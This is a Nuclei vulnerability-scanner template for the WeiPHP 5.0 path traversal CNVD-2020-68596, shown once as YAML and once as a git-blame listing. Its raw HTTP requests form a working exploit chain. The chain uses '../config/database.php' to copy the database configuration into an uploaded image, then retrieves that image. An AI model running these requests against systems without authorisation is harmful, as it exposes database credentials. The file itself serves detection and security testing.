nuclei-templates/http/cnvd/2020/CNVD-2020-68596.yaml

id: CNVD-2020-68596

info:
  name: WeiPHP 5.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: WeiPHP 5.0 is susceptible to directory traversal attacks.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: cnvd,cnvd2020,weiphp,lfi

http:
  - raw:
      - |
        POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        "1":1
      - |
        GET /public/index.php/home/file/user_pics HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        part: body
        internal: true
        regex:
          - '/public/uploads/picture/(.*.jpg)'
    matchers:
      - type: word
        part: body
        words:
          - https://weiphp.cn
          - WeiPHP
          - DB_PREFIX
        condition: and
# digest: 490a004630440220510a1de2daebb2a7cd068ca47f43ea4d9c42ee75ecf84d60422c38a1b62e92910220712a48b29bb2d311b699983ccc765ab83b4468a09eb60a6ff65aa71d59b18e07:922c64590222798bb761d5b6d8e72950
moving files around 2021-06-03 16:24:08 +00:00			`id: CNVD-2020-68596`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00
			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: WeiPHP 5.0 - Path Traversal`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00			`author: pikpikcu`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`severity: high`
templateman update 2023-10-14 11:27:55 +00:00			`description: WeiPHP 5.0 is susceptible to directory traversal attacks.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`
			`cvss-score: 8.6`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 3`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cnvd,cnvd2020,weiphp,lfi`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00			`- raw:`
			`- \|`
			`POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`"1":1`
			`- \|`
			`GET /public/index.php/home/file/user_pics HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
Update weiphp-path-traversal.yaml 2021-02-25 10:48:18 +00:00			`GET {{endpoint}} HTTP/1.1`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00			`Host: {{Hostname}}`

			`extractors:`
			`- type: regex`
Update weiphp-path-traversal.yaml 2021-02-25 10:48:18 +00:00			`name: endpoint`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00			`part: body`
Update weiphp-path-traversal.yaml 2021-02-25 10:48:18 +00:00			`internal: true`
Create weiphp-path-traversal.yaml 2021-02-25 08:59:17 +00:00			`regex:`
			`- '/public/uploads/picture/(.*.jpg)'`
			`matchers:`
matcher update 2021-02-25 12:59:49 +00:00			`- type: word`
Update and rename cnvd/CNVD-2020-68596.yaml to cnvd/2020/CNVD-2020-68596.yaml 2022-01-04 06:24:45 +00:00			`part: body`
matcher update 2021-02-25 12:59:49 +00:00			`words:`
improved matcher 2021-02-25 17:34:21 +00:00			`- https://weiphp.cn`
			`- WeiPHP`
			`- DB_PREFIX`
templateman update 2023-10-14 11:27:55 +00:00			`condition: and`
Auto Template Signing [Fri Jan 26 08:31:11 UTC 2024] :robot: 2024-01-26 08:31:11 +00:00			`# digest: 490a004630440220510a1de2daebb2a7cd068ca47f43ea4d9c42ee75ecf84d60422c38a1b62e92910220712a48b29bb2d311b699983ccc765ab83b4468a09eb60a6ff65aa71d59b18e07:922c64590222798bb761d5b6d8e72950`